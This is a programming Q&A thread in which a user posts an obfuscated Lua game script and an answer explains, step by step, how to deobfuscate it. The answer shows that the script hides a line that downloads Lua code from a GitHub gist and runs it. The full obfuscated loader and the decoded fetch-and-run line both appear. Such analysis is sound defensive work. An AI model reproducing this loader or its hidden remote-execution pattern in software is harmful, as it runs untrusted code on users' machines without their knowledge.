# How to decrypt an obfuscated lua script

Tags: lua, obfuscation

How can I decrypt this new Lua encryption method?

```
key=[[BREW STORE]];dmnpxzbtpptkabbbstzuaaiyxqbgfszjdhxuxcztvmrghjbawfatwzqandrzrfqlragsyqggkpbvtqktxbckpewunqnfosobaogiitkfsbzuihgljnzslgtmjmgkdasx='om jangan decrypt aku :((';awzmplriqloyociafdhovyenmbcbhqmyegwedddczphgbvubquftewkdqtypcsxmsxihkcwajhqqwidoleeudnahsscjbmlkaocozlvxsbnjbyphljxkcavllyevkhii='Obfuscator Ini Milik ZiGB';jknofzqxfwhpgpwunwnntdqilsqedpbwajyxnzgqchnbspvvehqoyvqdsavrovwklpgfbzpyiorpggadtdjbworigkbdnkbsspfsobalqavigtcfwehcreyeftezpkdi='Kamu Nyari Load?';rzoekzjkzzarhiovruxttaybxqpnhiobpvhbcywmhqlcfoltkbktsjwkldwgobariqrhmimxrmmlbrwhpvurflbcgjonrjvfuappyjeqpmdjghdviciyqkrfpnburddu='Saya Tak Ragu Ingin Nembak Gay People';yazmbcaksoywojorasrbfjqppsgyjdqlzwulsjbfyjxnvxebwmmdxqwkqmhepswuioueybvygkqgijdkrfwmlswajeadgafqggjcdafxxqfgvcmcuennmaesreozhlbn="Soeharto is first indonesian president. Jokowi is seventh indonesian's president, Itadori Yuuji is one of main character in Jujutsu Kaisen Anime, Kento Nanami is Side Character On Jujutsu Kaisen Anime. Lava is 1 of the most dangerous liquid in the world (cap)";mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju={ 1,160,3,187,236,277,257,244,160,185,307,173,170,186,170,164,168,168,280,246,160,160,160,160,160,160,160,160,160,160,160,200,279,224,161,392,224,227,218,252,260,265,275,259,271,274,260,205,258,271,276,205,268,277,257,205,271,258,262,277,275,259,257,276,271,274,252,260,265,275,259,271,274,260,205,258,271,276,205,268,277,257,205,271,258,262,277,275,259,257,276,271,274,252,260,265,275,259,271,274,260,205,258,271,276,205,268,277,257,205,271,258,262,277,275,259,257,276,271,274,252,271,258,262,277,275,259,257,276,261,260,252,261,270,259,206,268,277,257,293,296,160,160,215,161,337,171,160,160,160,299,160,160,161,171,161,160,162,174,161,162,163,299,161,160,164,302,161,163,165,179,162,160,320,242,160,160,160,289,290,213,288,161,163,215,288,289,163,208,288,161,292,209,288,289,292,179,288,161,293,216,288,289,165,210,288,161,166,216,288,289,166,218,288,161,167,210,288,289,167,217,288,161,296,217,288,289,296,175,288,161,297,179,288,289,297,176,288,161,170,195,288,289,170,194,288,161,299,201,288,289,299,176,288,161,300,181,288,289,300,175,288,161,301,176,288,289,301,211,288,161,302,217,288,289,302,217,288,161,303,215,288,289,175,217,288,161,304,188,288,289,176,183,288,161,177,183,288,289,177,211,288,161,178,212,288,289,178,217,288,161,307,217,288,289,307,182,288,161,180,211,288,289,180,212,288,161,309,217,288,289,309,211,288,161,182,218,288,289,310,208,288,161,183,218,288,289,183,217,288,161,184,210,288,289,312,216,288,161,185,209,288,289,185,215,288,161,314,214,288,289,314,217,288,161,187,210,288,238,162,210,160,289,290,214,288,161,291,217,288,289,291,182,288,161,164,209,288,289,164,215,288,161,165,214,288,289,165,183,288,161,294,208,288,289,294,216,288,161,167,210,288,289,167,219,288,161,296,209,288,289,168,210,288,161,297,216,288,289,169,217,288,161,170,183,288,289,170,210,288,161,171,188,288,289,171,209,288,161,300,186,288,289,172,208,288,161,301,209,288,289,301,187,288,161,302,186,288,289,174,208,288,161,303,209,288,289,175,184,288,161,304,185,288,289,304,187,288,161,177,208,288,289,177,185,288,161,306,208,288,289,178,210,288,161,307,186,288,289,179,188,288,161,180,208,288,289,180,208,288,161,309,208,288,289,181,184,288,161,310,210,288,289,182,185,288,161,311,209,288,289,183,186,288,161,184,210,288,289,184,208,288,161,185,210,288,289,185,209,288,161,186,188,288,289,186,183,288,161,315,216,288,238,162,210,210,289,162,208,288,161,163,219,288,289,163,183,288,161,164,210,288,289,292,184,288,161,293,183,288,289,165,184,288,161,294,185,288,289,294,187,288,161,295,186,288,289,295,187,288,161,168,187,288,289,168,186,288,161,169,185,288,289,297,185,288,161,170,186,288,289,298,209,288,161,171,185,288,289,299,185,288,161,172,186,288,289,300,186,288,161,301,185,288,289,301,184,288,161,302,210,288,289,174,185,288,161,303,185,288,289,175,186,288,161,304,209,288,289,176,187,288,161,305,184,288,289,177,209,288,161,306,210,288,289,306,184,288,161,307,185,288,289,307,185,288,161,308,187,288,289,308,183,288,161,309,184,288,289,181,188,288,161,310,185,288,289,182,187,288,161,311,184,288,289,183,185,288,161,184,183,288,289,312,193,288,161,313,194,288,289,313,208,288,161,314,216,288,289,186,210,288,161,187,219,288,238,162,210,260,289,290,182,288,161,291,213,288,289,163,218,288,161,164,208,288,289,292,176,288,161,165,180,288,289,165,180,288,161,294,175,288,289,294,179,288,161,167,180,288,238,162,170,310,356,161,162,160,228,161,160,160,356,160,160,160,228,160,160,161,231,160,161,160,294,164,294,272,259,257,268,268,164,293,268,271,257,260,164,295,275,276,274,265,270,263,164,293,259,264,257,274,164,294,276,257,258,268,261,164,295,277,270,272,257,259,267,289,160,160,160,288,161,337,162,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,288,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,161,289,409,295,288,289,293,255,229,238,246};local nau = 'load'; function krcqzqcsngsbnxfkqsexgiuiqovaprtpzaheaskjzihhbncooqhmmlelpomnwnisnezltuxbtjyxjyoxizmjsgskspqfmzbtiyhiycxvrhgocdbhopcpekzxeyhjezko(...) local nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm='';for hjkvtiyybvwvdxzbaltomtvihqfwcgxqjzsjowtthjlvqhgusuqokkipovcdptyjrhqynclxozdzicxtieoetduxrjtelnxpwpipzwduyoiyikjaxiyltvhxkotryzdb=1, #mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju do if hjkvtiyybvwvdxzbaltomtvihqfwcgxqjzsjowtthjlvqhgusuqokkipovcdptyjrhqynclxozdzicxtieoetduxrjtelnxpwpipzwduyoiyikjaxiyltvhxkotryzdb>3 then nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm=nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm.._ENV['\115\116\114\105\110\103']['\99\104\97\114']((mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju[hjkvtiyybvwvdxzbaltomtvihqfwcgxqjzsjowtthjlvqhgusuqokkipovcdptyjrhqynclxozdzicxtieoetduxrjtelnxpwpipzwduyoiyikjaxiyltvhxkotryzdb]-mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju[2]));end end;local tolan = 'loadstring';_ENV[_ENV['\115\116\114\105\110\103']['\99\104\97\114'](awzmplriqloyociafdhovyenmbcbhqmyegwedddczphgbvubquftewkdqtypcsxmsxihkcwajhqqwidoleeudnahsscjbmlkaocozlvxsbnjbyphljxkcavllyevkhii:lower():sub(18,18):byte(),dmnpxzbtpptkabbbstzuaaiyxqbgfszjdhxuxcztvmrghjbawfatwzqandrzrfqlragsyqggkpbvtqktxbckpewunqnfosobaogiitkfsbzuihgljnzslgtmjmgkdasx:lower():sub(1,1):byte(),rzoekzjkzzarhiovruxttaybxqpnhiobpvhbcywmhqlcfoltkbktsjwkldwgobariqrhmimxrmmlbrwhpvurflbcgjonrjvfuappyjeqpmdjghdviciyqkrfpnburddu:lower():sub(-9,-9):byte(),yazmbcaksoywojorasrbfjqppsgyjdqlzwulsjbfyjxnvxebwmmdxqwkqmhepswuioueybvygkqgijdkrfwmlswajeadgafqggjcdafxxqfgvcmcuennmaesreozhlbn:lower():sub(21,21):byte())](nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm)(); end;krcqzqcsngsbnxfkqsexgiuiqovaprtpzaheaskjzihhbncooqhmmlelpomnwnisnezltuxbtjyxjyoxizmjsgskspqfmzbtiyhiycxvrhgocdbhopcpekzxeyhjezko(mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju);
```

I tried many methods. But I don't think I'm experienced enough. The result was negative.

Comment: Could you give some background to this - is this a symmetric encryption algorithm? Do you have the encryption key?

Comment: Some of the code mentions an obfuscator - are you sure this isn't just code obfuscation? If it is, then any encryption done here will contain the key, and you just need to run enough of the code to unpack/decrypt it.

Comment: It can only be an obfuscator. I do not know exactly. But when I saw the key= phrase at the beginning, I thought it was encrypted. This is automation script for a game. And when I run it, it also sends junk messages to my discord. I just need to edit this and I need to see the code for it.

Comment: Try reformatting it, so you can work with it, and then play with the code to see what it does. If you don't trust it, run it in a virtual machine for safety. You will likely find one function does the decompression without running it.

Comment: Duplicate of https://stackoverflow.com/questions/75048696/how-to-decrypt-lua-script/75049370#75049370, check my answer on how to decrypt. However the code is compiled, it will remain unreadable.

Comment: Please clarify your specific problem or provide additional details to highlight exactly what you need. As it's currently written, it's hard to tell exactly what you're asking.

Answer (score 4, accepted):

1. Add proper linebreaks
2. Replace insane variable names with shorter ones
3. Unescape things like `'\115\116\114\105\110\103'` into `'string'`
4. Keep going until you realize the thing that starts with `_ENV[_ENV[` ends up becoming just `load` (by the way, `nau` and `tolan` are unused decoys)
5. Notice that it's a very simple decryption function that operates on the giant table of numbers and then `load`s the result
6. Modify the decryption function to print the result instead of loading it
7. Notice the result of doing so is Lua 5.4 bytecode
8. Run [unluac](https://sourceforge.net/projects/unluac/) on said bytecode

If you're following along, you'll have gotten this out of unluac (newlines elided for brevity):

```lua
pcall(load(string.char(table.unpack({ 108, 111, 97, 100, 40, 114, 101, 113, 117, 101, 115, 116, 32, 40, 34, 71, 69, 84, 34, 44, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 103, 105, 115, 116, 46, 103, 105, 116, 104, 117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 98, 114, 101, 119, 100, 101, 114, 115, 47, 101, 57, 99, 54, 97, 100, 56, 54, 97, 100, 49, 52, 56, 97, 51, 98, 101, 54, 57, 97, 97, 98, 49, 102, 51, 100, 53, 101, 97, 101, 99, 57, 47, 114, 97, 119, 47, 101, 50, 48, 49, 52, 56, 54, 56, 55, 53, 51, 52, 53, 100, 51, 52, 53, 54, 52, 50, 102, 51, 52, 53, 100, 55, 50, 99, 102, 50, 52, 52, 56, 48, 50, 57, 52, 55, 50, 51, 47, 68, 70, 98, 114, 101, 119, 46, 108, 117, 97, 34, 41, 41, 32, 40, 41}))))
```

Now reverse the `string.char` and `table.unpack` to see what it's really doing:

```lua
load(request ("GET", "https://gist.githubusercontent.com/brewders/e9c6ad86ad148a3be69aab1f3d5eaec9/raw/e201486875345d345642f345d72cf24480294723/DFbrew.lua")) ()
```

So https://gist.githubusercontent.com/brewders/e9c6ad86ad148a3be69aab1f3d5eaec9/raw/e201486875345d345642f345d72cf24480294723/DFbrew.lua (prettier at https://gist.github.com/brewders/e9c6ad86ad148a3be69aab1f3d5eaec9#file-dfbrew-lua) has what it's really doing, and it's finally not obfuscated at all. (The sha256 was 7de86710d2e66b6ef3b7e1a772d8d80c550b7a309925320e3296ffd333988e6d at the time of writing this answer; some archives/mirrors: [1](https://pastebin.com/DPWhFhz2) [2](https://archive.is/Y8nau) [3](https://archive.is/UEZ3m) [4](https://web.archive.org/web/20230212022544/https://gist.github.com/brewders/e9c6ad86ad148a3be69aab1f3d5eaec9))

And if you're wondering how this obfuscation happened, this string is present in the bytecode, which should give you a hint: `C:\discord-bot-lua-obfuscator\discord-bot-lua-obfuscator\discord-bot-lua-obfuscator\obfuscated\enc.lua`

Comment: you are amazing. Thank you for your work and guidance a lot.